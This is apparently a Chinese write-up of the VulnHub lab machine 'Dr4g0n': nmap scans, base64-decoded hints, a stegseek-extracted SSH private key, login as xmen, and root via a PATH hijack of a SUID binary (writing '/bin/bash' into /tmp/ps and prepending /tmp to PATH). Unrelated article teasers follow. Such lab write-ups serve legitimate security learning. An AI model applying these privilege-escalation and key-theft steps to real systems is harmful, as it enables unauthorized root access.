Dr4g0n

news2024/11/17 6:28:32

信息收集

# nmap -sn 192.168.56.0/24 -oN live.nmap                   
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 08:52 CST
Nmap scan report for 192.168.56.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.56.132
Host is up (0.00010s latency).
MAC Address: 00:0C:29:FB:90:3A (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.0011s latency).
MAC Address: 00:50:56:E8:10:E3 (VMware)
Nmap scan report for 192.168.56.130
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.16 seconds

探测到目标靶机的IP地址为192.168.56.132

# nmap -sT --min-rate 10000 -p- 192.168.56.132 -oN port.nmap                           
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 08:53 CST
Nmap scan report for 192.168.56.132
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:FB:90:3A (VMware)

端口信息探测到目标靶机仅开放端口22 和 80两个端口!

# nmap -sT -sC -sV -O -p22,80 192.168.56.132 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 08:54 CST
Nmap scan report for 192.168.56.132
Host is up (0.0031s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b5:77:4c:88:d7:27:54:1c:56:1d:48:d9:a4:1e:28:91 (RSA)
|   256 c6:a8:c8:9e:ed:0d:67:1f:ae:ad:6b:d5:dd:f1:57:a1 (ECDSA)
|_  256 fa:a9:b0:e3:06:2b:92:63:ba:11:2f:94:d6:31:90:b2 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: DRAGON BALL | Aj's
MAC Address: 00:0C:29:FB:90:3A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.5 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.66 seconds

详细信息的探测:22端口上是openssh 7.9 80端口上为apache开启的http服务 版本为2.4.38 存在一个title但是没有其他的详细信息了!

# nmap -sT --script=vuln -p22,80 192.168.56.132 -oN vuls.nmap 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 08:54 CST
Nmap scan report for 192.168.56.132
Host is up (0.00038s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:FB:90:3A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.24 seconds

默认漏洞脚本的信息探测显示存在一个robots文件,但是似乎也没什么其他的重要敏感信息!既然仅存在22和80俩个端口,那么我们将重点放在80端口上!

寻找立足点

80端口上看到了很多七龙珠的信息!robots文件中看到了疑似base64编码的字符串!

尝试解码:

似乎存在隐藏的目录,但是我们并不知道隐藏的目录是什么!尝试进行目录扫描:

这里用了两个工具,同时还用了不同的字典,但是似乎没有找到隐藏的目录:

you find the hidden dir 似乎告诉我们找到了隐藏目录,不会就是robots文件本身吧?似乎没什么用啊!尝试回到主页进行翻译:

(大概翻译了一下主页中所有的英文,似乎和整个靶机看起来并不是很相关!主页中存在三张图片!尝试下载下来看一下是不是存在隐写!)

哎!等会!发现了一点点不对的地方,首页查看源码的时候,又发现了疑似base64的东西:

尝试再次解码:

经过了三次base64的解码,发现了主题词 DRAGON BALL! 这是啥?不会是目录啥的?

真的是目录,本来还想着去看看三张图片的信息,但是三张图片的信息,并不是靶机上的资源,所以这里我判断可能也不会存在隐写的信息!(当然了这只是猜测,后续没什么突破的话 还是要看一下的!)

整体上看了一下secret文件中的内容和vulnhub中的信息:

secret中的信息是一些目录!一会可以利用目录扫描工具,进行扫描!

vulnhub目录下面存在着一张图片和一个登录的html页面:

先扫了一下目录,但是似乎看起来没有存在的目录信息:

login.html页面还是纯静态的!没啥用啊!

这个源码中似乎也没什么东西!还有一张图片了就,尝试下载下来看看里面是不是存在隐写吧,似乎没有其他的路可以走了!

这里我给四张图片(包括了前面看到的三张图片,全部都下载下来了!)看了一下是否存在隐写信息,看起来也没什么东西啊:

后面找到了stegseek工具,发现aj图片中存在隐写信息:

找到了密码字段为love 存在原始文件id_rsa! 尝试提取出这个文件!

发现提取出来的文件是 私钥文件! 尝试给予权限:

因为在login.html页面看到了用户名为xmen! 尝试利用私钥进行连接!

连接成功之后,建立了初始立足点!尝试进行提权!

提权

确定目标靶机的ip地址,并不是docker环境!尝试提权,查看/etc/passwd文件:

还存在一个用户名为cyber!

当前目录下面存在一个flag文件!发现当前用户的目录下面存在一个目录为script,里面存在两个文件,但是这个两个文件的权限,都是root,其他用户的权限只有执行和读的权限:

看到了demo文件中的内容是设置了组id和用户id!似乎没有修改的权限!查看了sudo权限,当然我们没有密码,看不到,同时还看了一下suid文件:

尝试去看了家目录,但是发现并没有刚才看到cyber用户!

既然上面的shell具有suid权限,那么我们可以尝试重写一个ps等!在tmp目录下面重写ps!写入/bin/bash!

echo '/bin/bash' > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
之后执行shell进行提权:

最终提权成功!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1540941.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Redis】Redisson实现分布式锁

Redisson是一个在Redis的基础上实现的Java驻内存数据网格(In-Memory Data Grid)。它不仅提供了一系列的分布式的Java常用对象,还提供了许多分布式服务,其中就包含了各种分布式锁的实现。 官网地址 GitHub地址 Redisson入门 1.引…

docker安装ES7.1.1(单机版)+ik分词器+es-head可视化

系列文章目录 文章目录 系列文章目录前言 前言 前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站,这篇文章男女通用,看懂了就去分享给你的码吧。 Elasticsearch 是一…

海外媒体发稿:7款爆款标题生成器解析-华媒舍

科普文章是将科学知识普及给大众的一种方式,而一个引人入胜的标题往往是吸引读者的第一步。在科普领域中,标题的吸引力至关重要。以下将介绍7款风靡科普界的爆款标题生成器,帮助你创作出引人入胜的科普文章。 1. 情感引爆 情感是人类行为中的…

卷积篇 | YOLOv8改进之主干网络中引入可变形卷积DConv

前言:Hello大家好,我是小哥谈。可变形卷积模块是一种改进的卷积操作,它可以更好地适应物体的形状和尺寸,提高模型的鲁棒性。可变形卷积模块的实现方式是在标准卷积操作中增加一个偏移量offset,使卷积核能够在训练过程中扩展到更大的范围,从而实现对尺度、长宽比和旋转等各…

QML 布局管理器之GridLayout 项目demo

一.气体控制效果图 二.界面布局代码实现 //DottedLline.qml 虚线绘制 import QtQuick 2.12 import QtQuick.Shapes 1.12Shape {id:canvaswidth: parent.widthheight: parent.heightShapePath{strokeStyle: ShapePath.DashLinestartX: 8startY: 10dashPattern: [1, 3]PathLine{…

多线程和线程同步

文章目录 进程和线程线程的操作线程创建线程退出线程回收线程分离线程取消和ID比较 线程同步互斥锁死锁读写锁条件变量信号量 进程和线程 线程是轻量级的进程,在Linux环境下线程的本质还是进程。 在计算机上运行的程序是一组指令及指令参数的组合,指令按…

Web前端-JS

JavaScript,简称js:负责网页的行为(交互效果)。是一门跨平台,面向对象的脚本语言(编写出来的语言不需要编译,通过浏览器的解释就可以运行) JS引入方式 1.内嵌样式 这样打开页面就会…

毕业答辩PPT模板涵盖多种风格,包括母版的设计及主题色的设计

毕业答辩PPT模板涵盖多种风格,包括母版的设计及主题色的设计 前言一两个页面的展示研究内容主题概述主题内容一:主要面向三点研究内容主题内容二:主要面向两点研究内容主题内容三:主要面向包含应用开发的研究 前言 之前做了有关开…

Oracle Data Guard部署

Oracle的主备DG搭建 1. 修改主机名,同步时间 主库IP:192.168.100.137 备库IP:192.168.100.138配置主机名(主库) Hostname zygjpdb vim /etc/hosts 192.168.100.137 zygjpdb 192.168.100.138 zygjsdbvim /etc/sysconfig/network HOSTNAMEzygjpdb ------…

电脑如何关闭自启动应用?cmd一招解决问题

很多小伙伴说电脑刚开机就卡的和定格动画似的,cmd一招解决问题: CtrlR打开cmd,输入:msconfig 进入到这个界面: 点击启动: 打开任务管理器,禁用不要的自启动应用就ok了

机器学习算法那些事 | 使用Transformer模型进行时间序列预测实战

本文来源公众号“机器学习算法那些事”,仅用于学术分享,侵权删,干货满满。 原文链接:使用Transformer模型进行时间序列预测实战 时间序列预测是一个经久不衰的主题,受自然语言处理领域的成功启发,transfo…

C语言分支和循环

目录 一.分支 一.if 二.if else 三.if else嵌套 四.else if 五.switch语句 二.循环 一.while (do while)break : 二.for函数: 三.goto语句: 四.猜数字: 一.分支 一.if if要条件为真才执行为假不执行而且if只能执行后面第一条如果要执行多条就…

Java基础之关键字instanceof(七)

简介: CSDN博客专家,专注Android/Linux系统,分享多mic语音方案、音视频、编解码等技术,与大家一起成长! 优质专栏:Audio工程师进阶系列【原创干货持续更新中……】🚀 优质专栏:多媒…

【C语言】linux内核pci_iomap

一、pci_iomap /** pci_iomap 是一个用于映射 PCI 设备的 BAR(Base Address Register,基地址寄存器)的函数。* 此函数返回指向内存映射 IO 的指针,用于直接访问 PCI 设备的内存或 I/O 空间。* * 参数:* dev - 指向pci_dev结构的指…

Android Jetpack Compose基础之组件的帧渲染

Android Jetpack Compose基础之组件的帧渲染 组合布局LayoutModifier示例 LayoutCompsable示例 绘制CanvasDrawModifierDrawModifier-drawWithContent示例 DrawModifier-drawBehind源码示例 DrawModifier-drawWithCache源码示例 拓展Modifier.graphicsLayer Android View 系统&…

0基础 三个月掌握C语言(13)-下

数据在内存中的存储 浮点数在内存中的存储 常见的浮点数:3.141592、1E10等 浮点数家族包括:float、double、long double类型 浮点数表示的范围:在float.h中定义 练习 关于(float*)&n: &n:这是一…

基于SSM的宠物领养平台的设计与实现

基于SSM的宠物领养平台的设计与实现 获取源码——》公主号:计算机专业毕设大全 获取源码——》公主号:计算机专业毕设大全

Three.js 中的 OrbitControls 是一个用于控制相机围绕目标旋转以及缩放、平移等操作的控制器。

demo案例 Three.js 中的 OrbitControls 是一个用于控制相机围绕目标旋转以及缩放、平移等操作的控制器。下面是它的详细讲解: 构造函数: OrbitControls(object: Camera, domElement?: HTMLElement)object:THREE.Camera 实例,控制器将围绕…

LibFuzzer 基本使用

文章目录 前言环境搭建基础使用编写 fuzz target编译链接demo 测试 && 输出日志分析心脏滴血漏洞测试 提高代码覆盖率和测试速度指定种子语料库多核并行 Fuzz使用字典 参考 前言 相较于 AFL 来说,LibFuzzer 在单个进程内完成模糊测试,以此来避免…

Nacos部署(一)Linux部署Nacos2.3.x单机环境

😊 作者: 一恍过去 💖 主页: https://blog.csdn.net/zhuocailing3390 🎊 社区: Java技术栈交流 🎉 主题: Nacos部署(一)Linux部署Nacos2.3.x单机环境 ⏱️…